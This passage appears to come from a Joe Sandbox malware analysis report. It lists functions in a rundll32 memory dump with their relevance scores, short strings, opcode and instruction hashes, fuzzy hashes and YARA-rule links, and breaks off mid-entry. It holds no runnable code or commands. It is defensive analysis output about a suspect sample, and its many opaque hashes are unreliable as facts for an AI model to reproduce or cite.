                                                                                    • Opcode ID: 8c02ea7021a394ea39df6700d72ddbc1f46ea017291a3444e3f5b8521650f894
                                                                                    • Instruction ID: 361909a13f67fe4a8d6898a70b58f5ae6136f9919c58e495a92a6f6f68fbb9d3
                                                                                    • Opcode Fuzzy Hash: 8c02ea7021a394ea39df6700d72ddbc1f46ea017291a3444e3f5b8521650f894
                                                                                    • Instruction Fuzzy Hash: E141F331B001154BDF188A6888587FF77B6EFC8210F1062ADD656DBAD8EB35A94687D0
                                                                                    Function 043B50BF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $tq
                                                                                    • API String ID: 0-2018120210
                                                                                    • Opcode ID: d0af7652593109e05e09b26512df1b74462172daae9f3a1a762a8145748b3d0e
                                                                                    • Instruction ID: 08d50de113e667fe1fd743fa0665cd4f30bfd83fb5b0db2ccdde330911f8f1f7
                                                                                    • Opcode Fuzzy Hash: d0af7652593109e05e09b26512df1b74462172daae9f3a1a762a8145748b3d0e
                                                                                    • Instruction Fuzzy Hash: 9731B530A10204EFDB189B75D8947EE7BB2EF88308F14D029D551AB791DF71A842CB91
                                                                                    Function 043B2D60 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRtq
                                                                                    • API String ID: 0-4092542751
                                                                                    • Opcode ID: 55a904ca9aab8e123ca82ca881f9bbfd90a161b0450748c2f5949e25f9434a27
                                                                                    • Instruction ID: 024abd71eef892fb3474c93bbd4b197ced6acc5327a290f736f8e01e71038f90
                                                                                    • Opcode Fuzzy Hash: 55a904ca9aab8e123ca82ca881f9bbfd90a161b0450748c2f5949e25f9434a27
                                                                                    • Instruction Fuzzy Hash: 1C210271B001115FDB189E3998487FF37AAEFC4214F1066ADE696C76D4EB34AC0287D0
                                                                                    Function 043B28C4 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (xq
                                                                                    • API String ID: 0-3100309293
                                                                                    • Opcode ID: 2999e82a083348ad8cf4e8200138857d15bedb644c48e02307b79132a45cc684
                                                                                    • Instruction ID: 1a6c6c2228fc77a4690ae0725bad5a358b0c0ae899d9089e79c8a40c67d05bf5
                                                                                    • Opcode Fuzzy Hash: 2999e82a083348ad8cf4e8200138857d15bedb644c48e02307b79132a45cc684
                                                                                    • Instruction Fuzzy Hash: 572178717083145FE7185A2554543FE3F9AEFC5350F14902AEB899BB91DE289C02D3E1
                                                                                    Function 043B8A10 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRtq
                                                                                    • API String ID: 0-4092542751
                                                                                    • Opcode ID: 7a5196469e6ae5dbb733837d9269d4c49c0bcfcb15fc4120cd744fc84eed2c3b
                                                                                    • Instruction ID: 55740455845d563528039d3669fc7c2f00bb00f8e46d49f42d459a6417ae8555
                                                                                    • Opcode Fuzzy Hash: 7a5196469e6ae5dbb733837d9269d4c49c0bcfcb15fc4120cd744fc84eed2c3b
                                                                                    • Instruction Fuzzy Hash: 90217570F05209ABDB18EBA1D4957EE7BBAEF88710F109429E502A7780DFB46D05CB91
                                                                                    Function 043B8A20 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRtq
                                                                                    • API String ID: 0-4092542751
                                                                                    • Opcode ID: ecb70ec45a8948f692445606a46e3a632c49b4a7f3766dee3b79710eb81e37df
                                                                                    • Instruction ID: b4a6ae753345b2728cfc313a5e474e838c55023817434859918dab189a284ed6
                                                                                    • Opcode Fuzzy Hash: ecb70ec45a8948f692445606a46e3a632c49b4a7f3766dee3b79710eb81e37df
                                                                                    • Instruction Fuzzy Hash: BF215030B00209ABDB0CEB61D5597EE7BBAAF88710F109129E502A7384DFB46D05CBD1
                                                                                    Function 043B6CD0 Relevance: .4, Instructions: 428COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6010047e7bea1aa88e12b915b9c164ab1a82053f530a1850042cad7c03fb6f3a
                                                                                    • Instruction ID: 5301baf3ed09cd51b7eb07fca30330cc7c2cbe670ebe4c8ecd3606829a61405e
                                                                                    • Opcode Fuzzy Hash: 6010047e7bea1aa88e12b915b9c164ab1a82053f530a1850042cad7c03fb6f3a
                                                                                    • Instruction Fuzzy Hash: 73E1F26190E3D15FDB038B7898656DA7FB19F57214B0A41CBD0C0DF5A3E668AA0CC7A3
                                                                                    Function 043B29C8 Relevance: .2, Instructions: 228COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 77726d33588513bda8b1ebdfee64deb7996740945dfe7ff672cddb286997b6fb
                                                                                    • Instruction ID: 6f9fa9e1b10417a1941e4d317f3f7e186aca4ed1a8d1684c705050f2a60d1631
                                                                                    • Opcode Fuzzy Hash: 77726d33588513bda8b1ebdfee64deb7996740945dfe7ff672cddb286997b6fb
                                                                                    • Instruction Fuzzy Hash: 3E919F35A00605CFDB14EF79C8546AEB7B2FF88310B148659E949AB714EF74ED81CB90
                                                                                    Function 043B626C Relevance: .2, Instructions: 225COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 20fdc17e6d3ca3abd0174ee0cfddd0cb6f746440135d219e2b06710fdd375c91
                                                                                    • Instruction ID: 60cc7b0eceb184c08c5d4b6b72b7579dc50634495812bf68ccb6b2bbd3a8e059
                                                                                    • Opcode Fuzzy Hash: 20fdc17e6d3ca3abd0174ee0cfddd0cb6f746440135d219e2b06710fdd375c91
                                                                                    • Instruction Fuzzy Hash: 09811531A093949FD706CB78D8A06DD7FB6EF8A304B054097E580CF6A3D630AC09C7A2
                                                                                    Function 043B29A1 Relevance: .2, Instructions: 164COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bdac74c4385f8e26eb03dea9a15f70f33ef25415c4df2b86ee92a029f028f291
                                                                                    • Instruction ID: f986ccb186a09f7c0ca5735290ca7152c652c32a7b3bfe1c50e4fe165767dca0
                                                                                    • Opcode Fuzzy Hash: bdac74c4385f8e26eb03dea9a15f70f33ef25415c4df2b86ee92a029f028f291
                                                                                    • Instruction Fuzzy Hash: 96518D346002008FDB15EF39C4946AABBA6EF887107148699E949DF355EF38EC42CBD1
                                                                                    Function 043B6F78 Relevance: .1, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0d5d356001a2c5c26f7bcfdcb6cbcf34dfc869d8f35e31e9a8f1174f73fa31b
                                                                                    • Instruction ID: 24885a954ccb0cde2737b8f6192e74dc5beec4c17644c61a219a51643a8636c1
                                                                                    • Opcode Fuzzy Hash: d0d5d356001a2c5c26f7bcfdcb6cbcf34dfc869d8f35e31e9a8f1174f73fa31b
                                                                                    • Instruction Fuzzy Hash: 69519E70E102099FDB04DFB9D854BDDBBB2FF88300F109669E114AB391EB74A985CB91
                                                                                    Function 043B1F08 Relevance: .1, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac99cd14422934f3b32778c42be15d3fa274dfeee4510ed0cbd90370139e62b2
                                                                                    • Instruction ID: a4d5495e7eae5900decb0defcdcf88857bcc9c4e550d00fc7dfa9878464d76fc
                                                                                    • Opcode Fuzzy Hash: ac99cd14422934f3b32778c42be15d3fa274dfeee4510ed0cbd90370139e62b2
                                                                                    • Instruction Fuzzy Hash: C5316C327082456FCB295A7468757BA7F2A8FC53D0B096167D7C8CF556CA24A806C3E1
                                                                                    Function 043B2268 Relevance: .1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d26db0d89cc0f7b9399b71ea8cce410c0d77cd7ca599399175f64769154ec3c
                                                                                    • Instruction ID: 591e504d882c4e92865c0119736f5b72a232797cff08c9a6bad89c96316c8b6a
                                                                                    • Opcode Fuzzy Hash: 9d26db0d89cc0f7b9399b71ea8cce410c0d77cd7ca599399175f64769154ec3c
                                                                                    • Instruction Fuzzy Hash: 80410635B002049FCB54DF69D884ADEBBB6FF88310B108169EA05EB360DB31EC41CB90
                                                                                    Function 043B28E4 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ae615ad9ae44f82805a495f41cd064c5c9e5b0ac546dc9986ae4675fc7b8d21
                                                                                    • Instruction ID: 1eede3fc07077496ab61136469142b38e1d396698665944dde6a74d5f10584da
                                                                                    • Opcode Fuzzy Hash: 5ae615ad9ae44f82805a495f41cd064c5c9e5b0ac546dc9986ae4675fc7b8d21
                                                                                    • Instruction Fuzzy Hash: EA216A316013686FEB16267428687FB3F58CF42364F10A0A7FFC99A951D929E84693E1
                                                                                    Function 043B6390 Relevance: .1, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e80369483b4f865d82c829ff32f3270b507b03704fd8960393401cfc952b947e
                                                                                    • Instruction ID: 7d62413824f3cf66468942f07ef628564301d04fd4488baca988a22f0bcf93ff
                                                                                    • Opcode Fuzzy Hash: e80369483b4f865d82c829ff32f3270b507b03704fd8960393401cfc952b947e
                                                                                    • Instruction Fuzzy Hash: 7841E574A106189FCB44DFA9D484A9DBBF6FF8C710B248069E905EB325DB30EC42CB91
                                                                                    Function 043B63A0 Relevance: .1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fdd382e6384a8e1a438d8042a113e66d41719283269100a2e12acf428f3cd009
                                                                                    • Instruction ID: e8cbb302a0b507519d7a5626531ed9ad4b163d237ac81329c3c8c11d6576cc35
                                                                                    • Opcode Fuzzy Hash: fdd382e6384a8e1a438d8042a113e66d41719283269100a2e12acf428f3cd009
                                                                                    • Instruction Fuzzy Hash: AF31C374A106189FCB44DFA9D484A9DBBFAFF8C710B258069E905EB325DB70EC41CB91
                                                                                    Function 043B28D4 Relevance: .1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7f6aacb3ca301abb088451e57a05152907d17a082bfa2142e4835a5e0fa6490f
                                                                                    • Instruction ID: 046d585639252b45a0e06611e942914e9eda72bc4a6416b98e887325d14b118a
                                                                                    • Opcode Fuzzy Hash: 7f6aacb3ca301abb088451e57a05152907d17a082bfa2142e4835a5e0fa6490f
                                                                                    • Instruction Fuzzy Hash: 4C110A21B0426817F729267458583FB2B89CF81654F0066E6EAC9CBF46D958EC4343D2
                                                                                    Function 043B3070 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0001c846bfcaa850af5939f85a421137fd4e7e7f1bf40db78361f0c40786fa6
                                                                                    • Instruction ID: 2baecb7c6f67a1fa3cbc330b32e4a1bae8f2ba8ad992c52240fb395e56bd8b05
                                                                                    • Opcode Fuzzy Hash: d0001c846bfcaa850af5939f85a421137fd4e7e7f1bf40db78361f0c40786fa6
                                                                                    • Instruction Fuzzy Hash: 0C21A734A00115ABDB18DF64C890BEA7BB6EF8C310F149024D945A7B90DE75AC4BCBD1
                                                                                    Function 043B9440 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ed006f9dcca10e29e021dcc66e2114f1f921d2082874ad2783d4f430e732fb11
                                                                                    • Instruction ID: 66d8d23c3ffc8cd7ed7a29fdb9bbda969eeaac837dcad138a0aea6544862eb02
                                                                                    • Opcode Fuzzy Hash: ed006f9dcca10e29e021dcc66e2114f1f921d2082874ad2783d4f430e732fb11
                                                                                    • Instruction Fuzzy Hash: 5E218774A001046FEB08DF54C4A0BE97BB6EF8C310F205015D94567B80CF387C4ACB90
                                                                                    Function 043B2258 Relevance: .1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a09c4d09a65bcba274bee6e124ee52e0946d1f6b219854608d9768d4d55962e4
                                                                                    • Instruction ID: c480f595da7a946a3d6f2aec247bb31593911c25cf28c3ddb04d5d72c0313a8f
                                                                                    • Opcode Fuzzy Hash: a09c4d09a65bcba274bee6e124ee52e0946d1f6b219854608d9768d4d55962e4
                                                                                    • Instruction Fuzzy Hash: FC213B75F102149FCB44DF79D4809DEBBB1EF8D710B10816AE905AB320DB309842CB90
                                                                                    Function 043B1958 Relevance: .1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c230d67cd5e883d8a3f65e23b705ba3684e9b17f92caa16d010f7e77b89e84c
                                                                                    • Instruction ID: 5ba7ffa36c2517b54dd9101c933d7fe732017679d26cc16e07b3657a8c37ccb0
                                                                                    • Opcode Fuzzy Hash: 7c230d67cd5e883d8a3f65e23b705ba3684e9b17f92caa16d010f7e77b89e84c
                                                                                    • Instruction Fuzzy Hash: 75217F35600215AFEB18DF68D895AF9BBBAEF8C310F115019E949A7740CF346C4ADB90
                                                                                    Function 043B3080 Relevance: .1, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 93b85368578922438818898982a92288de7284f3deeea98a9cc4f012b2f1136d
                                                                                    • Instruction ID: 64b185e1473e67f10057e5c154b3adf396cf8abd82c2eaeeb6b81bd6c3d57c03
                                                                                    • Opcode Fuzzy Hash: 93b85368578922438818898982a92288de7284f3deeea98a9cc4f012b2f1136d
                                                                                    • Instruction Fuzzy Hash: DA113074A00114AFEB18DF64C8A0BEA7BBAEF8C314F149025D545A7790DE75AC49CB90
                                                                                    Function 043B7F90 Relevance: .1, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a789ce9cb19270bf6f90bf89ffdc908dd11f497142d9135c203b2a5c498ceda
                                                                                    • Instruction ID: f8827773cee5249d378f0e81a18312d044e2ba55d433e582aca13d441508f55f
                                                                                    • Opcode Fuzzy Hash: 8a789ce9cb19270bf6f90bf89ffdc908dd11f497142d9135c203b2a5c498ceda
                                                                                    • Instruction Fuzzy Hash: 9C019E743043400FD322162DECD1AC67FA6EFD5624311926AE996CF603DE2CA80F87E1
                                                                                    Function 043B9450 Relevance: .1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a023f973762efeebc9c88b995700934c5d8c112dec814dec88a305ef5e0a1a40
                                                                                    • Instruction ID: 1ad389afde793c5e4fa48efe0aa6d04aab4d02dfd5bf9caa94e760b83ff1eb18
                                                                                    • Opcode Fuzzy Hash: a023f973762efeebc9c88b995700934c5d8c112dec814dec88a305ef5e0a1a40
                                                                                    • Instruction Fuzzy Hash: 87113D70A00104AFEB18DF64D4A4BE97BBAEF8C314F146019D549A7B80CF796C49CBD0
                                                                                    Function 043B1378 Relevance: .1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 164d59f5338e349eb1e79f4d09361262f2932eaf8752a0543135242db1380150
                                                                                    • Instruction ID: d2ca8ea24b32cf7fd5663e239f082dac92422998a766fa3bbfb8d63ee1d3d86a
                                                                                    • Opcode Fuzzy Hash: 164d59f5338e349eb1e79f4d09361262f2932eaf8752a0543135242db1380150
                                                                                    • Instruction Fuzzy Hash: 7B211571D002498FDB10DFAAC484ADEFBF4FF58324F148429D559A7240CB756946CFA1
                                                                                    Function 043B2CD0 Relevance: .1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7fff022d03a9a895f8f486e09e094c4caecece2ff5149f4c2648c345af23c300
                                                                                    • Instruction ID: 4d044a39a8930719811650fb47a383bc13762ab92c108b2220a5d202bc603a9b
                                                                                    • Opcode Fuzzy Hash: 7fff022d03a9a895f8f486e09e094c4caecece2ff5149f4c2648c345af23c300
                                                                                    • Instruction Fuzzy Hash: CE01C232B001188BDF148AA8C8143EEB7B6EF88315F045179D159B3694DB39A94587A0
                                                                                    Function 043B8038 Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0ff38673736c6801be0af553a7b89792fcd4e2615bea3d7ec7a42628b964b5f
                                                                                    • Instruction ID: e92ce550caaac3a7eb42457bd97d780bd18ccd81cdbbb487aa278ec447371df8
                                                                                    • Opcode Fuzzy Hash: d0ff38673736c6801be0af553a7b89792fcd4e2615bea3d7ec7a42628b964b5f
                                                                                    • Instruction Fuzzy Hash: D0017136300510AB8708DA6DE4949AEB79AEBD8270314807AF609C7310DF72EC1287A4
                                                                                    Function 043B1380 Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9291b319a4b7acf782040067e21b4e6efa35d2e435555adb13f5f3d9ee7a653
                                                                                    • Instruction ID: ef7f5b2ef1f42a5aacb7d1ce3e8ca4e795b3f49f01b97fc240ec7f51174da401
                                                                                    • Opcode Fuzzy Hash: b9291b319a4b7acf782040067e21b4e6efa35d2e435555adb13f5f3d9ee7a653
                                                                                    • Instruction Fuzzy Hash: 09110675D002498FDB10DFAAC484AEEFBF4FF58324F14841AD559A7240CB756905CFA5
                                                                                    Function 043B1440 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d8580a8a155e35b69acdbd13ab4cdbfc0eef11201aec3f1facff0c82913305b5
                                                                                    • Instruction ID: 127d5498e01957ca3c03dbbcb113ccc083f43d8f3017198afcdf21ac73cb0118
                                                                                    • Opcode Fuzzy Hash: d8580a8a155e35b69acdbd13ab4cdbfc0eef11201aec3f1facff0c82913305b5
                                                                                    • Instruction Fuzzy Hash: A30168B06092055FCF0D4F3868B62663FA9DFCA34030118AAD689CF942F924980DC3D1
                                                                                    Function 043B1968 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c1c344b6fc0db87bd44b6648bf44d3a5b25b429798ca0ca5b257dcdba9adffd7
                                                                                    • Instruction ID: aa60189c0bcbffa19009ecf3d7b3f0c71e03e612749f7adf420dd0b3905cbcc0
                                                                                    • Opcode Fuzzy Hash: c1c344b6fc0db87bd44b6648bf44d3a5b25b429798ca0ca5b257dcdba9adffd7
                                                                                    • Instruction Fuzzy Hash: 53114271600214BFDB18DF64D494AB97BBAEF8C310F155019E549A7780CF796C49CB90
                                                                                    Function 043B6A1F Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf9cc458a33338341213e6e6a00776d68131c1cf422f3cc3947fb0e28255b89d
